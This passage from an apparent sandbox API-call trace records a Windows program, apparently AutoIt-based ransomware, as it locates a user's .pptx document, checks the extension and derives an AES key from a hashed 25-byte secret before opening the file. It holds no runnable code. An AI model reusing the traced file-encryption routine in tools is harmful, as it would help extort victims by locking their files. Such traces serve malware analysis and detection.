dwFlags=0x0, lpMem=0x9ba018 | out: hHeap=0x8a0000) returned 1 [0171.413] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd708 | out: hHeap=0x8a0000) returned 1 [0171.414] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd360 | out: hHeap=0x8a0000) returned 1 [0171.414] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd468 | out: hHeap=0x8a0000) returned 1 [0171.414] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8de830 | out: hHeap=0x8a0000) returned 1 [0171.414] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b9f70 | out: hHeap=0x8a0000) returned 1 [0171.414] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba120 | out: hHeap=0x8a0000) returned 1 [0171.414] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1a30 | out: hHeap=0x8a0000) returned 1 [0171.414] PeekMessageW (in: lpMsg=0x87f3fc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f3fc) returned 0 [0171.414] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="no", cchCount1=2, lpString2="no", cchCount2=2) returned 2 [0171.414] PeekMessageW (in: lpMsg=0x87f81c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f81c) returned 0 [0171.414] CharUpperBuffW (in: lpsz="_ENCRYPT", cchLength=0x8 | out: lpsz="_ENCRYPT") returned 0x8 [0171.414] PeekMessageW (in: lpMsg=0x87f5c4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f5c4) returned 0 [0171.414] CharUpperBuffW (in: lpsz="_GETFILEEXT", cchLength=0xb | out: lpsz="_GETFILEEXT") returned 0xb [0171.414] PeekMessageW (in: lpMsg=0x87f094, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f094) returned 0 [0171.414] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="x", cchCount1=1, lpString2=".", cchCount2=1) returned 3 [0171.414] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="tx", cchCount1=1, lpString2=".", cchCount2=1) returned 3 [0171.414] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="ptx", cchCount1=1, lpString2=".", cchCount2=1) returned 3 [0171.414] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="pptx", cchCount1=1, lpString2=".", cchCount2=1) returned 3 [0171.414] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1=".pptx", cchCount1=1, lpString2=".", cchCount2=1) returned 2 [0171.414] PeekMessageW (in: lpMsg=0x87f5c4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f5c4) returned 0 [0171.414] PeekMessageW (in: lpMsg=0x87f5c4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f5c4) returned 0 [0171.414] PeekMessageW (in: lpMsg=0x87f5c4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f5c4) returned 0 [0171.414] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\KuxYygUpCCsKE_KnyRa.pptx", lpFindFileData=0x87eec0 | out: lpFindFileData=0x87eec0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x70bdfbc0, ftCreationTime.dwHighDateTime=0x1d593aa, ftLastAccessTime.dwLowDateTime=0x189ff370, ftLastAccessTime.dwHighDateTime=0x1d5ac29, ftLastWriteTime.dwLowDateTime=0x189ff370, ftLastWriteTime.dwHighDateTime=0x1d5ac29, nFileSizeHigh=0x0, nFileSizeLow=0x4d63, dwReserved0=0x0, dwReserved1=0x8a7560, cFileName="KuxYygUpCCsKE_KnyRa.pptx", cAlternateFileName="KUXYYG~1.PPT")) returned 0x90add8 [0171.416] FindClose (in: hFindFile=0x90add8 | out: hFindFile=0x90add8) returned 1 [0171.416] PeekMessageW (in: lpMsg=0x87f5c4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f5c4) returned 0 [0171.416] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\KuxYygUpCCsKE_KnyRa.pptx", lpFindFileData=0x87eec0 | out: lpFindFileData=0x87eec0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x70bdfbc0, ftCreationTime.dwHighDateTime=0x1d593aa, ftLastAccessTime.dwLowDateTime=0x189ff370, ftLastAccessTime.dwHighDateTime=0x1d5ac29, ftLastWriteTime.dwLowDateTime=0x189ff370, ftLastWriteTime.dwHighDateTime=0x1d5ac29, nFileSizeHigh=0x0, nFileSizeLow=0x4d63, dwReserved0=0x0, dwReserved1=0x8a7560, cFileName="KuxYygUpCCsKE_KnyRa.pptx", cAlternateFileName="KUXYYG~1.PPT")) returned 0x90add8 [0171.416] FindClose (in: hFindFile=0x90add8 | out: hFindFile=0x90add8) returned 1 [0171.417] PeekMessageW (in: lpMsg=0x87f5c4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f5c4) returned 0 [0171.417] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="\"C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\KuxYygUpCCsKE_KnyRa.pptx\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 1 [0171.417] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\KuxYygUpCCsKE_KnyRa.pptx\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 1 [0171.417] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1=":\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\KuxYygUpCCsKE_KnyRa.pptx\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 1 [0171.417] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\KuxYygUpCCsKE_KnyRa.pptx\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 1 [0171.417] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="Users\\5p5NrGJn0jS HALPmcxz\\Documents\\KuxYygUpCCsKE_KnyRa.pptx\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0171.417] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="sers\\5p5NrGJn0jS HALPmcxz\\Documents\\KuxYygUpCCsKE_KnyRa.pptx\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0171.417] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="ers\\5p5NrGJn0jS HALPmcxz\\Documents\\KuxYygUpCCsKE_KnyRa.pptx\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 1 [0171.417] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="rs\\5p5NrGJn0jS HALPmcxz\\Documents\\KuxYygUpCCsKE_KnyRa.pptx\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0171.417] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="s\\5p5NrGJn0jS HALPmcxz\\Documents\\KuxYygUpCCsKE_KnyRa.pptx\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0171.417] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="\\5p5NrGJn0jS HALPmcxz\\Documents\\KuxYygUpCCsKE_KnyRa.pptx\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 1 [0171.417] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="5p5NrGJn0jS HALPmcxz\\Documents\\KuxYygUpCCsKE_KnyRa.pptx\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 1 [0171.417] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="p5NrGJn0jS HALPmcxz\\Documents\\KuxYygUpCCsKE_KnyRa.pptx\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0171.417] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="5NrGJn0jS HALPmcxz\\Documents\\KuxYygUpCCsKE_KnyRa.pptx\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 1 [0171.417] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="NrGJn0jS HALPmcxz\\Documents\\KuxYygUpCCsKE_KnyRa.pptx\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0171.417] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="rGJn0jS HALPmcxz\\Documents\\KuxYygUpCCsKE_KnyRa.pptx\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0171.417] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="GJn0jS HALPmcxz\\Documents\\KuxYygUpCCsKE_KnyRa.pptx\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0171.417] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="Jn0jS HALPmcxz\\Documents\\KuxYygUpCCsKE_KnyRa.pptx\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0171.417] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="n0jS HALPmcxz\\Documents\\KuxYygUpCCsKE_KnyRa.pptx\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0171.417] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="0jS HALPmcxz\\Documents\\KuxYygUpCCsKE_KnyRa.pptx\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 1 [0171.417] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="jS HALPmcxz\\Documents\\KuxYygUpCCsKE_KnyRa.pptx\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0171.417] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="S HALPmcxz\\Documents\\KuxYygUpCCsKE_KnyRa.pptx\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0171.417] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1=" HALPmcxz\\Documents\\KuxYygUpCCsKE_KnyRa.pptx\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 1 [0171.417] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="HALPmcxz\\Documents\\KuxYygUpCCsKE_KnyRa.pptx\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0171.417] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="ALPmcxz\\Documents\\KuxYygUpCCsKE_KnyRa.pptx\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 1 [0171.417] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="LPmcxz\\Documents\\KuxYygUpCCsKE_KnyRa.pptx\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0171.418] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="Pmcxz\\Documents\\KuxYygUpCCsKE_KnyRa.pptx\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0171.418] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="mcxz\\Documents\\KuxYygUpCCsKE_KnyRa.pptx\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0171.418] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="cxz\\Documents\\KuxYygUpCCsKE_KnyRa.pptx\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 1 [0171.418] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="xz\\Documents\\KuxYygUpCCsKE_KnyRa.pptx\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0171.418] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="z\\Documents\\KuxYygUpCCsKE_KnyRa.pptx\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0171.418] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="\\Documents\\KuxYygUpCCsKE_KnyRa.pptx\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 1 [0171.418] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="Documents\\KuxYygUpCCsKE_KnyRa.pptx\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 1 [0171.418] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="ocuments\\KuxYygUpCCsKE_KnyRa.pptx\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0171.418] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="cuments\\KuxYygUpCCsKE_KnyRa.pptx\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 1 [0171.418] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="uments\\KuxYygUpCCsKE_KnyRa.pptx\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0171.418] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="ments\\KuxYygUpCCsKE_KnyRa.pptx\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0171.418] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="ents\\KuxYygUpCCsKE_KnyRa.pptx\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 1 [0171.418] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="nts\\KuxYygUpCCsKE_KnyRa.pptx\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0171.418] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="ts\\KuxYygUpCCsKE_KnyRa.pptx\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0171.418] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="s\\KuxYygUpCCsKE_KnyRa.pptx\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0171.418] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="\\KuxYygUpCCsKE_KnyRa.pptx\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 1 [0171.418] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="KuxYygUpCCsKE_KnyRa.pptx\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0171.418] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="uxYygUpCCsKE_KnyRa.pptx\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0171.418] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="xYygUpCCsKE_KnyRa.pptx\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0171.418] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="YygUpCCsKE_KnyRa.pptx\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0171.418] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="ygUpCCsKE_KnyRa.pptx\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0171.418] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="gUpCCsKE_KnyRa.pptx\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0171.418] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="UpCCsKE_KnyRa.pptx\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0171.418] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="pCCsKE_KnyRa.pptx\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0171.418] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="CCsKE_KnyRa.pptx\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 1 [0171.418] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="CsKE_KnyRa.pptx\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 1 [0171.418] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="sKE_KnyRa.pptx\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0171.418] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="KE_KnyRa.pptx\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0171.418] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="E_KnyRa.pptx\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 1 [0171.418] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="_KnyRa.pptx\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 1 [0171.418] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="KnyRa.pptx\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0171.419] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="nyRa.pptx\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0171.419] PeekMessageW (in: lpMsg=0x87f5c4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f5c4) returned 0 [0171.419] CharUpperBuffW (in: lpsz="_CRYPT_ENCRYPTFILE", cchLength=0x12 | out: lpsz="_CRYPT_ENCRYPTFILE") returned 0x12 [0171.419] CharUpperBuffW (in: lpsz="_GETFILENAMEEXEXT", cchLength=0x11 | out: lpsz="_GETFILENAMEEXEXT") returned 0x11 [0171.419] PeekMessageW (in: lpMsg=0x87f154, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f154) returned 0 [0171.419] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="x", cchCount1=1, lpString2=".", cchCount2=1) returned 3 [0171.419] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="tx", cchCount1=1, lpString2=".", cchCount2=1) returned 3 [0171.419] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="ptx", cchCount1=1, lpString2=".", cchCount2=1) returned 3 [0171.419] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="pptx", cchCount1=1, lpString2=".", cchCount2=1) returned 3 [0171.419] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1=".pptx", cchCount1=1, lpString2=".", cchCount2=1) returned 2 [0171.419] PeekMessageW (in: lpMsg=0x87f154, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f154) returned 0 [0171.419] PeekMessageW (in: lpMsg=0x87f154, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f154) returned 0 [0171.419] PeekMessageW (in: lpMsg=0x87f154, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f154) returned 0 [0171.419] PeekMessageW (in: lpMsg=0x87f154, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f154) returned 0 [0171.419] PeekMessageW (in: lpMsg=0x87f36c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f36c) returned 0 [0171.419] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\KuxYygUpCCsKE_KnyRa.pptx", lpFindFileData=0x87edb8 | out: lpFindFileData=0x87edb8*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x70bdfbc0, ftCreationTime.dwHighDateTime=0x1d593aa, ftLastAccessTime.dwLowDateTime=0x189ff370, ftLastAccessTime.dwHighDateTime=0x1d5ac29, ftLastWriteTime.dwLowDateTime=0x189ff370, ftLastWriteTime.dwHighDateTime=0x1d5ac29, nFileSizeHigh=0x0, nFileSizeLow=0x4d63, dwReserved0=0x87ef08, dwReserved1=0x8a7560, cFileName="KuxYygUpCCsKE_KnyRa.pptx", cAlternateFileName="KUXYYG~1.PPT")) returned 0x90af58 [0171.419] FindClose (in: hFindFile=0x90af58 | out: hFindFile=0x90af58) returned 1 [0171.419] PeekMessageW (in: lpMsg=0x87f36c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f36c) returned 0 [0171.419] CharUpperBuffW (in: lpsz="_CRYPT_STARTUP", cchLength=0xe | out: lpsz="_CRYPT_STARTUP") returned 0xe [0171.420] PeekMessageW (in: lpMsg=0x87f114, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f114) returned 0 [0171.420] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNT", cchLength=0x10 | out: lpsz="__CRYPT_REFCOUNT") returned 0x10 [0171.420] PeekMessageW (in: lpMsg=0x87ecf4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ecf4) returned 0 [0171.420] PeekMessageW (in: lpMsg=0x87f114, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f114) returned 0 [0171.420] LoadLibraryW (lpLibFileName="Advapi32.dll") returned 0x74f20000 [0171.420] PeekMessageW (in: lpMsg=0x87f114, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f114) returned 0 [0171.420] PeekMessageW (in: lpMsg=0x87f114, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f114) returned 0 [0171.420] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLESET", cchLength=0x14 | out: lpsz="__CRYPT_DLLHANDLESET") returned 0x14 [0171.420] PeekMessageW (in: lpMsg=0x87eebc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87eebc) returned 0 [0171.420] PeekMessageW (in: lpMsg=0x87eebc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87eebc) returned 0 [0171.420] PeekMessageW (in: lpMsg=0x87f114, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f114) returned 0 [0171.420] PeekMessageW (in: lpMsg=0x87f114, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f114) returned 0 [0171.420] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0171.420] PeekMessageW (in: lpMsg=0x87eac4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87eac4) returned 0 [0171.420] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0171.420] CryptAcquireContextA (in: phProv=0x87ea98, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x87ea98*=0x9c0b78) returned 1 [0171.514] PeekMessageW (in: lpMsg=0x87f114, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f114) returned 0 [0171.515] CharUpperBuffW (in: lpsz="__CRYPT_CONTEXTSET", cchLength=0x12 | out: lpsz="__CRYPT_CONTEXTSET") returned 0x12 [0171.515] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNTINC", cchLength=0x13 | out: lpsz="__CRYPT_REFCOUNTINC") returned 0x13 [0171.515] CharUpperBuffW (in: lpsz="_CRYPT_DERIVEKEY", cchLength=0x10 | out: lpsz="_CRYPT_DERIVEKEY") returned 0x10 [0171.515] CharUpperBuffW (in: lpsz="_CRYPT_STARTUP", cchLength=0xe | out: lpsz="_CRYPT_STARTUP") returned 0xe [0171.515] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNT", cchLength=0x10 | out: lpsz="__CRYPT_REFCOUNT") returned 0x10 [0171.515] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNTINC", cchLength=0x13 | out: lpsz="__CRYPT_REFCOUNTINC") returned 0x13 [0171.515] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0171.515] CharUpperBuffW (in: lpsz="__CRYPT_CONTEXT", cchLength=0xf | out: lpsz="__CRYPT_CONTEXT") returned 0xf [0171.515] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0171.515] CryptCreateHash (in: hProv=0x9c0b78, Algid=0x8003, hKey=0x0, dwFlags=0x0, phHash=0x87e808 | out: phHash=0x87e808) returned 1 [0171.515] CharLowerBuffW (in: lpsz="byte[25]", cchLength=0x8 | out: lpsz="byte[25]") returned 0x8 [0171.515] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0171.515] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0171.515] CryptHashData (hHash=0x90ae18, pbData=0x8debf0, dwDataLen=0x19, dwFlags=0x1) returned 1 [0171.515] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0171.515] CharUpperBuffW (in: lpsz="__CRYPT_CONTEXT", cchLength=0xf | out: lpsz="__CRYPT_CONTEXT") returned 0xf [0171.515] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0171.515] CryptDeriveKey (in: hProv=0x9c0b78, Algid=0x660e, hBaseData=0x90ae18, dwFlags=0x1, phKey=0x87e808 | out: phKey=0x87e808*=0x90af18) returned 1 [0171.516] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0171.516] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0171.516] CryptDestroyHash (hHash=0x90ae18) returned 1 [0171.517] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\KuxYygUpCCsKE_KnyRa.pptx" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\kuxyygupccske_knyra.pptx"), dwDesiredAccess=0x80000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x120 [0171.517] SetFilePointerEx (in: hFile=0x120, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0171.517] SetFilePointerEx (in: hFile=0x120, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x87ef40 | out: lpNewFilePointer=0x0) returned 1 [0171.517] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8decb8 [0171.518] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd3f0 [0171.518] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2698 [0171.518] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd4f8 | out: hHeap=0x8a0000) returned 1 [0171.518] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd408 | out: hHeap=0x8a0000) returned 1 [0171.518] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd840 | out: hHeap=0x8a0000) returned 1 [0171.518] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8df1e0 | out: hHeap=0x8a0000) returned 1 [0171.518] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c27f8 | out: hHeap=0x8a0000) returned 1 [0171.518] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c27f8 [0171.518] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20a) returned 0x8e8808 [0171.518] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2738 [0171.518] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e8808 | out: hHeap=0x8a0000) returned 1 [0171.518] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2738 | out: hHeap=0x8a0000) returned 1 [0171.518] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c27f8 | out: hHeap=0x8a0000) returned 1 [0171.518] RtlAllocateHeap (HeapHandle=0x8a0000, 